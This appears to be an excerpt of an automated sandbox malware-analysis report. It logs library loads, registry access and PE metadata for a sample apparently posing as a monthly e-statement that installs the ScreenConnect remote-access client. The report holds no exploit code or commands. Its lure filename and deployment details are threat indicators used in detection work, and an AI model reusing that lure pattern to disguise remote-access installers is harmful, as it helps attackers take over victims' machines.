                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: certificate valid
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B424A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EBB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569312203.0000000002F12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: monthly-eStatementForum120478962.Client.exe
